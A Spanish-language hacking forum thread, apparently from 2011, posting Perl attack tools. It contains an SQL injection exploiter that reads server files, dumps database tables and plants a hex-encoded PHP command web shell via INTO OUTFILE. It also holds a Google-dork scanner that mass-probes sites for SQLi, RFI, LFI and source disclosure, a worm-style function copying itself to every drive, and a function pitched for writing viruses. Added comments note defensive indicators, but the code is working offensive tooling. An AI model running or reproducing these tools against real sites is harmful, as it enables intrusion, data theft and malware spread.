savefile($_[3].".txt","[Table] : $_[2]");
for my $columns(@buscar1) {
chomp $columns;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
if ($code =~/ERTOR854/g) {
print "[Column] : $columns\n";
savefile($_[3].".txt","[Column Found] : $columns");
}}
} else {
print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
}
}

# Option 9: tries to read each path in @buscar3 through MySQL load_file().
# Arguments: $_[0] URL with placeholder, $_[1] bypass style, $_[2] log name.
# Each path is hex-encoded by encode() and requested between two ERTOR854
# markers; whatever comes back between the markers is printed and appended to
# the log as the file's contents.
#
# Defensive reading: load_file() returns data only when the database account
# holds the FILE privilege, the file is readable by the database server
# process and, where the server's secure_file_priv setting is in effect, the
# path lies inside the permitted directory. Removing FILE from application
# accounts defeats this option entirely.
sub load {
savefile($_[2].".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($_[1]);
if ($_[0] =~/(.*)hackman(.*)/g) {
print "\n[+] Searching files with load_file...\n\n\n";
my $start = $1; my $end = $2;
for my $file(@buscar3) {
chomp $file;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass2);
if ($code =~/ERTOR854(.*)ERTOR854/g) {
print "[File Found] : $file\n";
print "\n[Source Start]\n\n";
print $1;
print "\n\n[Source End]\n\n";
savefile($_[2].".txt","[File Found] : $file");
savefile($_[2].".txt","\n[Source Start]\n");
savefile($_[2].".txt","$1");
savefile($_[2].".txt","\n[Source End]\n");
}}}}

# Option 10: extracts two columns of a table row by row.
# Arguments: $_[0] URL with placeholder, $_[1] first column, $_[2] second
# column, $_[3] table, $_[4] bypass style, $_[5] log name.
# The sub shares its name with Perl's builtin dump(); the caller uses the
# explicit '&dump(...)' form.
# A count() query on the first column gives the number of rows; each row is
# then fetched with "limit <n>,1", the two values separated by ERTOR854
# markers. The first response without markers ends the extraction via reload().
# Table and column names typed by the user are placed in the request unchanged.
#
# Defensive reading: one GET per row with an increasing "limit" offset; every
# extracted value is also written in clear to the local log file.
sub dump {
savefile($_[5].".txt","\n");
print "\n";
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){
my $start = $1;
my $end = $2;
print "[+] Extracting values...\n\n";
# $concatx asks for the row count, $concat for one row's two column values.
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1;
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) {
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n";
} else {
print "\n\n[+] Extracting Finish\n";
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}

# Returns the string in $_[0] as a "0x..." hexadecimal literal, one "%x"
# conversion per character (no zero padding). The result is also left in the
# package variable $hex.
sub encode {
my $string = $_[0];
$hex = '0x' . join('', map { sprintf("%x", ord($_)) } split(//, $string));
return $hex;
}

# Inverse of encode(): strips a leading "0x" from $_[0] (in place, so the
# caller's variable is modified too), reads the rest two hex digits at a time
# and returns the resulting string. The result is also left in the package
# variable $encode.
sub decode {
$_[0] =~ s/^0x//;
my @pairs = $_[0] =~ /../g;
$encode = join('', map { chr(hex($_)) } @pairs);
return $encode;
}

# Prints the copyright footer, waits for Enter and terminates the process with
# exit status 1. This is the second "sub finish" in the file; Perl keeps the
# definition it compiles last.
sub finish {
copyright();
my $ack = <STDIN>;
exit 1;
}


# Option 12: attempts to write a PHP file named shell.php into the web root
# with MySQL "INTO OUTFILE" and then requests it over HTTP to see whether the
# write succeeded.
# Arguments: URL with placeholder, bypass style, server-side directory typed by
# the user (the menu asks for a "Full Path Discloure" value), log name.
# The file content is sent as one hex literal; success is recognised by the
# title text "Mini Shell By Doddy" in the fetched page, and the resulting URL
# is appended to the log.
#
# Defensive reading: the write needs all of the following, and removing any one
# of them blocks it: the FILE privilege on the application's database account,
# a MySQL secure_file_priv setting that permits the target directory, and a
# web-served directory that the database server process can write to.
# Indicators left behind: a request whose query string contains "into",
# "outfile" and a quoted path ending in shell.php, followed by a GET for
# /shell.php from the same client; on disk, a shell.php owned by the database
# service account containing the title string above.
sub into {
print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
my ($page,$bypass,$dir,$save) = @_;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
# Work out the target directory and the URL under which the new file would be
# reachable from the path component of the page URL.
if ($path=~/\/(.*)$/) {
my $path1 = $1;
my $path2 = $path1;
$path2 =~s/$1//;
$dir =~s/$path1//ig;
$shell = $dir."/"."shell.php";
if ($page =~/(.*)hackman(.*)/ig) {
my  ($start,$end) = ($1,$2);
$code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
# Verification request for the file that was just written.
$code1 = toma("http://".$auth."/".$path2."/"."shell.php");
if ($code1=~/Mini Shell By Doddy/ig) {
print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
} else {
print "[shell] : Not Found\n";
}
}
}
}

#blog : doddy-hackman.blogspot.com
#contact : lepuke[at]hotmail[Com]
#The end



Si lo quieren descargar desde sourceforge

Código: php

https://sourceforge.net/projects/k0bra/

#495
Perl / [Perl] G00gl3nator By Doddy H
Julio 03, 2011, 09:45:53 PM
Bueno ,este es un scanner en su version grafica ,este programa puede scanear

  • SQLI
  • RFI
  • LFI
  • Full Source Disclosure

    También pueden buscar strings en Google; los resultados
    se guardan en una carpeta que el programa instala al ejecutarse

    Código: perl

    #!usr/bin/perl
    #Googlenator (C) Doddy Hackman 2011

    use Tk;
    use Tk::ROText;
    use Tk::FileSelect;
    use URI::Split qw(uri_split);
    use Cwd;
    use WWW::Mechanize;

    # On Windows, detach the program from its console window.
    if ($^O eq 'MSWin32') {
    use Win32::Console;
    Win32::Console::Free();
    }

    # Shared HTTP client used by toma() and dame_link(). autocheck => 0 keeps
    # failed requests from raising exceptions.
    my $nave = WWW::Mechanize->new(autocheck => 0);
    # Defender note: every request from this tool carries this fixed, dated
    # Firefox 2.0 User-Agent string, which is usable as a log signature.
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

    # Create the logs/ directory tree before the GUI starts.
    installer();

    # Main window, fixed size.
    my $new = MainWindow->new(-background=>"black");

    $new->title("Googlenator (C) Doddy Hackman 2011");
    $new->geometry("780x530");
    $new->resizable(0,0);

    # Menu bar with two menus: "Scan" (run a check over a URL list) and
    # "Logs" (open the saved result files).
    $d = $new->Frame(-relief=>"sunken",-bd=>1,-background=>"black",-foreground=>"cyan");
    my $scanx = $d->Menubutton(-text=>"Scan",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
    my $logsx = $d->Menubutton(-text=>"Logs",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
    $d->pack(-side=>"top",-fill=>"x");

    # Scan menu entries: each callback asks for a file of URLs and probes them.
    $scanx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadsql);
    $scanx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadrfi);
    $scanx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadlfi);
    $scanx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfsd);

    # Logs menu entries: each callback opens a result file or folder.
    $logsx->command(-label=>"GoogleSearchs",-background=>"black",-foreground=>"cyan",-command=>\&loadgoogle);
    $logsx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadfilesql);
    $logsx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilerfi);
    $logsx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilelfi);
    $logsx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfilefsd);

    # Read-only text area that all callbacks write their output to.
    my $box = $new->ROText(-background=>"black",-foreground=>"cyan",-width=> 104,-height=> 20)->place(-x =>20,-y=>60);
    head(); # draw the banner

    # Search form: search host, page limit and dork string, with defaults.
    $new->Label(-background=>"black",-foreground=>"cyan",-text=>"Google : ",-font=>"Impact")->place(-y=>"380",-x=>"20");

    my $google = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"30",-text=>"www.google.com.ar")->place(-x=>"80",-y=>"385");

    $new->Label(-background=>"black",-foreground=>"cyan",-text=>"Pages : ",-font=>"Impact")->place(-y=>"380",-x=>"300");

    my $pages = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"5",-text=>"30")->place(-y=>"385",-x=>"354");

    $new->Label(-background=>"black",-foreground=>"cyan",-font=>"Impact",-text=>"Dorks : ")->place(-y=>"380",-x=>"450");

    my $dorks = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"40",-text=>"index.php+id")->place(-y=>"385",-x=>"505");

    # Action buttons.
    $new->Button(-text=>"Search in Google",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&googler)->place(-y=>"450");
    $new->Button(-text=>"About",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&about)->place(-y=>"474");
    $new->Button(-text=>"Exit",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&exitx)->place(-y=>"498");

    # Hand control to the Tk event loop.
    MainLoop;

    # Reached only after MainLoop returns.
    head();

    # "Search in Google" button handler: runs the dork search and logs the hits.
    # Reads the search host, page limit and dork string from the three Entry
    # widgets, calls google() and lists every returned entry in the text box,
    # appending each one to logs/search/<dork>.txt through savefile().
    # NOTE(review): the log file name is the raw dork string, so characters
    # such as "/" become part of the path given to savefile() - confirm that
    # this is intended.
    sub googler {

    # Lexical copies of the field values; inside this sub they shadow the
    # widget variables of the same names.
    my $google = $google->get;
    my $pages = $pages->get;
    my $dorks = $dorks->get;

    head();

    $box->insert("end","\t\t[+] Searching pages with string $dorks\n\n");

    my @webas = google($google,$dorks,$pages);

    $box->insert("end","\t\t[+] Cleaning\n\n");
    # int(@webas) is the number of entries returned.
    $box->insert("end","\t\t[+] Webs Found ".int(@webas)."\n\n");

    for(@webas) {
    $new->update(); # let Tk process pending events while the loop runs
    $box->insert("end","\t\t[Link] : ".$_."\n");
    savefile($dorks.".txt",$_);
    }

    $box->insert("end","\n\t\t[+] All save in logs/search/".$dorks."\n");
    $box->insert("end","\t\t[+] Finished\n\n");

    }

    # Scan > SQL menu handler. Asks the user for a file with one URL per
    # line, trims each URL with clean() and probes it with scansql().
    #
    # scansql() is declared inside this sub's braces, but a named sub is
    # package-scoped in Perl, so it is an ordinary function.
    #
    # Defender notes: the probe appends "-1+union+select+666--" to the
    # parameter and counts the page as vulnerable when the response contains
    # the MySQL error "The used SELECT statements have a different number of
    # columns". The literal suffix is visible in request logs. Parameterised
    # queries remove the flaw, and not returning database errors to the
    # client removes the signal this check relies on.
    sub loadsql {

    $browse = $new->FileSelect(-directory => "/");
    my $filea = $browse->Show;

    head();
    $box->insert("end","\t\t[+] File : $filea\n");

    # NOTE(review): two-argument open on the chosen path, result unchecked.
    open (FILE,$filea);
    @words = <FILE>;
    close FILE;

    chomp @words;

    $box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

    for my $page(@words) {
    my $page = clean($page); # inner lexical shadows the loop variable
    $new->update();
    scansql($page);
    }

    # Probe one URL; a hit is shown in the text box and appended to
    # logs/vulz/sql-logs.txt via savefilevul().
    sub scansql {
    my ($pass1,$pass2) = ("+","--");
    my $page = shift;
    $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
    if ($code1=~/The used SELECT statements have a different number of columns/ig) {
    $box->insert("end","\t\t[+] SQLI : $page\n");
    savefilevul("sql-logs.txt",$page);
    }}}

    # Scan > RFI menu handler. Asks the user for a file with one URL per
    # line, trims each URL with clean() and probes it with scanrfi().
    #
    # Defender notes: the probe puts an external URL in the parameter value
    # and counts the page as vulnerable when a phrase from that external page
    # appears in the response, i.e. the application fetched and included
    # remote content. Parameters whose value is a URL on another host, and
    # outbound requests from the web server to that host, are the observable
    # traces. Disabling PHP's allow_url_include and never building include
    # paths from request data close the hole.
    sub loadrfi {

    $browse = $new->FileSelect(-directory => "/");
    my $filea = $browse->Show;

    head();
    $box->insert("end","\t\t[+] File : $filea\n");

    # NOTE(review): two-argument open on the chosen path, result unchecked.
    open (FILE,$filea);
    @words = <FILE>;
    close FILE;

    chomp @words;

    $box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

    for my $page(@words) {
    my $page = clean($page); # inner lexical shadows the loop variable
    $new->update();
    scanrfi($page);
    }

    # Probe one URL; a hit is shown in the text box and appended to
    # logs/vulz/rfi-logs.txt via savefilevul().
    sub scanrfi {
    my $page = shift;
    $code1 = toma($page."http:/www.supertangas.com/");
    if ($code1=~/Los mejores TANGAS de la red/ig) { #This is real knowledge xDDD
    $box->insert("end","\t\t[+] RFI : $page\n");
    savefilevul("rfi-logs.txt",$page);
    }}}

    # Scan > LFI menu handler. Asks the user for a file with one URL per
    # line, trims each URL with clean() and probes it with scanlfi().
    #
    # Defender notes: the probe appends a single quote to the parameter and
    # counts the page as a candidate when the response contains the PHP
    # warning text "No such file or directory in <b>...</b> on line", which
    # shows that the value reached a file function and that warnings are
    # rendered to the client. Turning display_errors off in production hides
    # the signal; mapping the parameter to an allow-list of files removes the
    # flaw.
    sub loadlfi {

    $browse = $new->FileSelect(-directory => "/");
    my $filea = $browse->Show;

    head();
    $box->insert("end","\t\t[+] File : $filea\n");

    # NOTE(review): two-argument open on the chosen path, result unchecked.
    open (FILE,$filea);
    @words = <FILE>;
    close FILE;

    chomp @words;

    $box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

    for my $page(@words) {
    my $page = clean($page); # inner lexical shadows the loop variable
    $new->update();
    scanlfi($page);
    }


    # Probe one URL; a hit is shown in the text box and appended to
    # logs/vulz/lfi-logs.txt via savefilevul().
    sub scanlfi {
    my $page = shift;
    $code1 = toma($page."'");
    if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
    $box->insert("end","\t\t[+] LFI : $page\n");
    savefilevul("lfi-logs.txt",$page);
    }}}

    # Scan > FSD menu handler ("full source disclosure"). Asks the user for a
    # file with one URL per line, trims each URL with clean() and probes it
    # with scanfsd().
    #
    # Defender notes: the probe passes the script's own path as the parameter
    # value and counts the page as vulnerable when the response contains the
    # source text of a download handler (a header( call followed by
    # "Content-Disposition: attachment;"), i.e. the script served its own
    # source. Download handlers should resolve an identifier to a file from a
    # fixed list or directory instead of accepting a path from the request.
    sub loadfsd {

    $browse = $new->FileSelect(-directory => "/");
    my $filea = $browse->Show;

    head();
    $box->insert("end","\t\t[+] File : $filea\n");

    # NOTE(review): two-argument open on the chosen path, result unchecked.
    open (FILE,$filea);
    @words = <FILE>;
    close FILE;

    chomp @words;

    $box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

    for my $page(@words) {
    my $page = clean($page); # inner lexical shadows the loop variable
    $new->update();
    scanfsd($page);
    }

    # Probe one URL; a hit is shown in the text box and appended to
    # logs/vulz/fsd-logs.txt via savefilevul().
    sub scanfsd {
    my $page = shift;
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
    if ($path=~/\/(.*)$/) {
    my $me = $1; # URL path without its leading slash
    $code1 = toma($page.$me);
    if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
    $box->insert("end","\t\t[+] Full Source Discloure : $page\n");
    savefilevul("fsd-logs.txt",$page);
    }}}}

    # Clear the output text box and draw the ASCII-art banner at the top.
    sub head {

    # Remove everything currently shown.
    $box->delete("0.0","end");

    # The banner is one multi-line string literal; its spacing is significant.
    $box->insert("end","
               @@@@     @@@      @@@      @@@@   @@   @@@@ @@   @@    @@   @@@@@@  @@@    @@@@ 
              @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@@  @@    @@     @@   @@@@@   @@ @@
             @@@      @@   @@  @@   @@  @@@      @@   @@   @@@@ @@   @@@@    @@  @@   @@  @@ @@
             @@  @@@  @@   @@  @@   @@  @@  @@@  @@   @@@@ @@ @ @@   @  @    @@  @@   @@  @@@@ 
             @@@  @@  @@   @@  @@   @@  @@@  @@  @@   @@   @@ @@@@  @@@@@@   @@  @@   @@  @@@@ 
              @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@  @@@  @@  @@   @@   @@@@@   @@ @@
               @@@      @@@      @@@      @@@    @@@@ @@@@ @@   @@  @@  @@   @@    @@@    @@  @@




    ");
    }

    # "About" button handler: open a small fixed-size window showing the
    # author's contact details. The window object is kept in the package
    # variable $about.
    sub about {
        # Colour options shared by every label in the window.
        my @colores = (-background=>"black",-foreground=>"cyan");

        $about = MainWindow->new(-background=>"black");
        $about->title("Googlenator v0.3");
        $about->geometry("300x110");
        $about->resizable(0,0);

        # Empty label used as a spacer above the text.
        $about->Label(@colores)->pack();
        $about->Label(-text=>"Contact : lepuke[at]hotmail[com]",-font=>"Impact",@colores)->pack();
        $about->Label(-text=>"Web : doddyhackman.webcindario.com",-font=>"Impact",@colores)->pack();
        $about->Label(-text=>"Blog : doddy-hackman.blogspot.com",-font=>"Impact",@colores)->pack();
    }

    # "Exit" button handler: terminate the program with exit status 1.
    sub exitx {
        exit 1;
    }

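    # Append one line to a findings log under logs/vulz/.
    #
    #   $_[0] - log file name, relative to logs/vulz/
    #   $_[1] - text to append; a newline is added
    #
    # Returns true when the line was written and the file closed cleanly,
    # false otherwise.
    #
    # Three-argument open with a lexical handle is used so the name is
    # treated purely as a path (two-argument open also interprets mode
    # characters and trims whitespace from it), and a failed open or close
    # is reported with warn instead of silently printing to an unopened
    # handle. Failure stays non-fatal, as before.
    sub savefilevul {
        my ($name, $text) = @_;
        my $path = "logs/vulz/" . $name;

        open(my $out, '>>', $path) or do {
            warn "savefilevul: cannot open $path: $!\n";
            return;
        };
        print {$out} $text . "\n";

        # Buffered write errors only surface at close.
        my $ok = close($out);
        warn "savefilevul: cannot close $path: $!\n" unless $ok;
        return $ok;
    }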

    # Fetch a URL with the shared WWW::Mechanize client ($nave) and return
    # the content of the response.
    sub toma {
        my ($url) = @_;
        my $respuesta = $nave->get($url);
        return $respuesta->content;
    }

    # Return what find_all_links() reports for the page most recently fetched
    # by the shared WWW::Mechanize client ($nave). The call is made in the
    # caller's context, so the result depends on how dame_link() is called.
    sub dame_link {
    return $nave->find_all_links();
    }

    # Cut a URL after its first "=": everything from the start up to and
    # including that "=" is returned, the rest is dropped.
    # When the string holds no "=" at all, no explicit value is returned and
    # the result is false.
    sub clean {
        my ($url) = @_;
        if ($url =~ /\=/) {
            # Only the part before the first "=" is kept.
            my ($prefijo) = split("=", $url);
            return $prefijo . "=";
        }
    }

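    # Append one line to a search log under logs/search/.
    #
    #   $_[0] - log file name, relative to logs/search/
    #   $_[1] - text to append; a newline is added
    #
    # Returns true when the line was written and the file closed cleanly,
    # false otherwise.
    #
    # Three-argument open with a lexical handle is used so the name is
    # treated purely as a path (two-argument open also interprets mode
    # characters and trims whitespace from it), and a failed open or close
    # is reported with warn instead of silently printing to an unopened
    # handle. Failure stays non-fatal, as before.
    sub savefile {
        my ($name, $text) = @_;
        my $path = "logs/search/" . $name;

        open(my $out, '>>', $path) or do {
            warn "savefile: cannot open $path: $!\n";
            return;
        };
        print {$out} $text . "\n";

        # Buffered write errors only surface at close.
        my $ok = close($out);
        warn "savefile: cannot close $path: $!\n" unless $ok;
        return $ok;
    }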

    # Run a search and collect entries from the result pages.
    #
    #   $_[0] - search host
    #   $_[1] - query string (the dork)
    #   $_[2] - highest "start" offset to request
    #
    # Requests the result pages with start=10,20,... up to $_[2], keeps the
    # links whose URL mentions webcache.googleusercontent.com, extracts one
    # field from each of them and returns the list after de-duplication by
    # repes().
    #
    # $pages, @links, @url and @founds are used without my before the last
    # statement, so they are package variables.
    sub google {

    for ($pages=10;$pages<=$_[2];$pages=$pages+10) {
    $new->update(); # let Tk process pending events between requests
    toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
    @links = dame_link();
    for my $l(@links) {
    if ($l->url() =~/webcache.googleusercontent.com/) {
    push(@url,$l->url());
    }
    }
    }

    # From each cache link keep the text between the second ':' after
    # "cache" and the next '+'.
    for(@url) {
    if ($_ =~/cache:(.*?):(.*?)\+/) {
    push(@founds,$2);
    }
    }

    # The right-hand side still refers to the package @founds; the lexical
    # declared here only exists from the next statement on.
    my @founds = repes(@founds);

    return @founds;
    }


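    # Create the log directory tree used by the tool: logs/, logs/search/
    # and logs/vulz/ under the current working directory.
    #
    # mkdir's second argument is a numeric mode. The original passed the
    # string "777", which Perl reads as decimal 777 (octal 1411), not
    # rwxrwxrwx. 0755 is used instead: the owner can write, group and others
    # cannot, and the process umask still applies.
    # Each directory is checked on its own, so a missing subdirectory is
    # recreated even when logs/ already exists. A failed mkdir is reported
    # with warn and does not stop the program.
    sub installer {
        for my $dir ("logs", "logs/search", "logs/vulz") {
            next if -d $dir;
            mkdir($dir, 0755) or warn "installer: cannot create $dir: $!\n";
        }
        return;
    }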

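    # Return the arguments with duplicates removed, keeping the first
    # occurrence of each value and the original order.
    #
    # The seen-table is lexical, so every call starts empty. The original
    # kept it and the result list in the package variables %repety and
    # @revisado, so a second call also returned everything from earlier
    # calls and treated earlier values as already seen.
    sub repes {
        my %visto;
        return grep { !$visto{$_}++ } @_;
    }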

    # Logs > GoogleSearchs menu entry: open the logs/search/ folder below the
    # current working directory with the Windows "start" shell command.
    sub loadgoogle {
        my $carpeta = getcwd()."/logs/search/";
        system("start ".$carpeta);
    }

    # Logs > SQL menu entry: open the SQL findings log with the Windows
    # "start" shell command.
    sub loadfilesql {
        my $registro = "logs/vulz/sql-logs.txt";
        system("start ".$registro);
    }


    # Logs > LFI menu entry: open the LFI findings log with the Windows
    # "start" shell command.
    sub loadfilelfi {
        my $registro = "logs/vulz/lfi-logs.txt";
        system("start ".$registro);
    }


    # Logs > RFI menu entry: open the RFI findings log with the Windows
    # "start" shell command.
    sub loadfilerfi {
        my $registro = "logs/vulz/rfi-logs.txt";
        system("start ".$registro);
    }


    # Logs > FSD menu entry: open the source-disclosure findings log with the
    # Windows "start" shell command.
    sub loadfilefsd {
        my $registro = "logs/vulz/fsd-logs.txt";
        system("start ".$registro);
    }

    # ¿ The End ?
#496
Perl / [Perl] Funcion writeword()
Julio 03, 2011, 09:45:38 PM
Hola , con esta funcion podran ejecutar word y escribir el texto que quieran, muy
util si quieren hacer un virus

Código: perl

#By Doddy H

use Win32::Clipboard;
use Win32::GuiTest qw(FindWindowLike SetForegroundWindow SendKeys);

# Start Microsoft Word and type the given text with simulated keystrokes.
#
#   $_[0] - key string handed to Win32::GuiTest's SendKeys
#
# Windows only: relies on the "start" shell command and on Win32::GuiTest.
# FindWindowLike and SetForegroundWindow are imported by the file but not
# used here.
sub loadword {

system("start winword.exe"); # launch Word through the shell

sleep 4; # fixed four-second wait before any keys are sent

SendKeys($_[0]); # send the keystrokes

}


Ejemplo de uso

Código: perl

loadword("Hola a todos");

#497
Perl / [Perl] Funcion wormer()
Julio 03, 2011, 09:45:25 PM
con esta funcion podran reproducir un archivo por todas las unidades disponibles

Código: perl

#ascii chr(65) = A | chr(90) = Z
#By Doddy H

use File::Copy;

# Copy the running script ($0) to the root of every drive letter A: to Z:.
# 65..90 are the ASCII codes of 'A'..'Z'; chr() turns each into its letter.
# The sub reads no arguments, so a value passed by the caller is ignored.
#
# Defender note: the observable behaviour is one process writing the same
# file to the root of many drive letters in a short burst, reaching whatever
# volumes are mounted on those letters. Auditing file creation on drive
# roots and blocking script execution from removable media address it.
sub wormear {
for my $dir(65..90) {
copy($0,chr($dir).":/");
}
}


Ejemplo de uso

Código: perl


wormear($0);

#498
Perl / [Perl] Funcion Speak()
Julio 03, 2011, 09:45:15 PM
Hola a todos, con esta simple función vamos a lograr que nuestra computadora hable y nos
diga lo que queremos, aunque solo puede hablar bien en inglés

Código: perl

#By Doddy H

use Win32::OLE;

# Speak a text aloud through the Windows speech API.
#
#   $_[0] - text to be spoken
#
# Creates a SAPI.SpVoice object through Win32::OLE and calls its Speak
# method with flags 0. Windows only.
sub speak {
    my ($texto) = @_;
    my $voz = Win32::OLE->new("SAPI.SpVoice");
    $voz->Speak($texto, 0);
}


Ejemplo de uso

Código: perl

speak("Hi brother");

#499
Perl / [Perl] Funcion screensave()
Julio 03, 2011, 09:45:05 PM
Hola a todos.

Con esta función podrán sacar una foto del sistema

Código: perl


#By Doddy H

use Win32::Clipboard;
use Win32::GuiTest qw(FindWindowLike SetForegroundWindow SendKeys);

# Take one capture as soon as the script runs.
capture_window();

# Save a screenshot to foto.bmp in the current directory.
#
# Sends Alt+PrintScreen ("%{PRTSCR}" in SendKeys notation), which puts an
# image of the active window on the clipboard, then reads that bitmap back
# with Win32::Clipboard::GetBitmap and writes it out in binary mode.
#
# Side effects visible here: the previous clipboard content is replaced by
# the capture, and an existing foto.bmp is overwritten ('>' mode).
# NOTE(review): two-argument open with a bareword handle, result unchecked;
# the lexical is named $a, which is also the name of sort's package variable.
sub capture_window {

SendKeys("%{PRTSCR}");

my $a = Win32::Clipboard::GetBitmap();

open (FOTO,">foto.bmp");
binmode(FOTO); # raw bytes, no newline translation
print FOTO $a;
close FOTO;

}


Ejemplo de uso

Código: perl

capture_window()


Y tendran la foto con el nombre de foto.bmp
#500
Perl / [Perl] Funcion savefile()
Julio 03, 2011, 09:44:43 PM
Hola, con esta función podrán crear un archivo y escribir en él.
Si el archivo ya existe, solo escribe al final y no lo borra

Código: perl

#By Doddy H
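# Append text to a file, creating the file when it does not exist yet.
#
#   $_[0] - path of the file
#   $_[1] - text to append (written as given, no newline is added)
#
# Returns true when the text was written and the file closed cleanly,
# false otherwise.
#
# Three-argument open with a lexical handle is used so the first argument
# is treated purely as a path: with the original two-argument form
# (">>" . $name) Perl also interprets special characters after the mode and
# trims whitespace from the name. A failed open or close is reported with
# warn instead of silently printing to an unopened handle.
sub savefile {
    my ($path, $text) = @_;

    open(my $out, '>>', $path) or do {
        warn "savefile: cannot open $path: $!\n";
        return;
    };
    print {$out} $text;

    # Buffered write errors only surface at close.
    my $ok = close($out);
    warn "savefile: cannot close $path: $!\n" unless $ok;
    return $ok;
}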


Ejemplo de uso

Código: perl

savefile("C:\\Windows\\Logs\\file.txt","hola")